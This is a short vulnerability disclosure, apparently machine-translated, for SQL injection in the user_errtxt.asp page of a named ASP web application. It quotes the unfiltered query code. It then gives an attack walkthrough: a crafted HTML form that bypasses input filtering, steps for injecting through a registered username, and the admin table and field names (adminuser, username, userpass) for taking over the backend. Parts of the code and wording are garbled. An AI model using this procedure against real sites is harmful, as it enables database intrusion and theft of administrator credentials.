Anti-DDoS pro
Http://www.asp300.com/View/10/27310.html under source code
Official http://wljy.prinfo.cn/
Vulnerability level: high
Vulnerability description:
The problem with this program is that username is not filtered out in user/user_errtxt.asp.
''''''''
If Request. ServerVariables ("REQUEST_METHOD") = "POST" then
Username1 = trim (Request. Form ("username "))
Sqltext = "select * from userbase where enable = 1 and username =" + username1 + ""
Response. Write sqltext
Response. End
Rs. Open sqltext, cn, 1, 1
If not rs. EOF then
Mmtext = trim (rs ("errtxt "))
Else
Response. Redirect "user_pass.asp? Err = 1"
End if
Rs. Close
End if
'''''''''''
However, username is read from the previous file user/user_pass.asp.
Of course, the previous file user/user_pass.asp is filtered out.
But it does not matter.
1. We can directly construct a form.
<Form action = "Note: Change user_errtxt.asp here? Model = 999 "method = post name = form1>
<Tr> <td align = right> member account: </td> <input name = "username" type = "text" size = 30> </td> </tr>
<Tr> <td align = right> </td> </tr>
<Tr> <td align = right> </td> <input name = "s1" type = "submit" value = "Confirm submission"> <input name =" b1 "type =" reset "value =" cancel REFILL ">
</Td> </tr>
</Form>
2. Register a user name
3. Fill in the form above with the registered user name to judge
4. Guess the password
The table name is adminuser and the field is username userpass.
5. Then we can make the background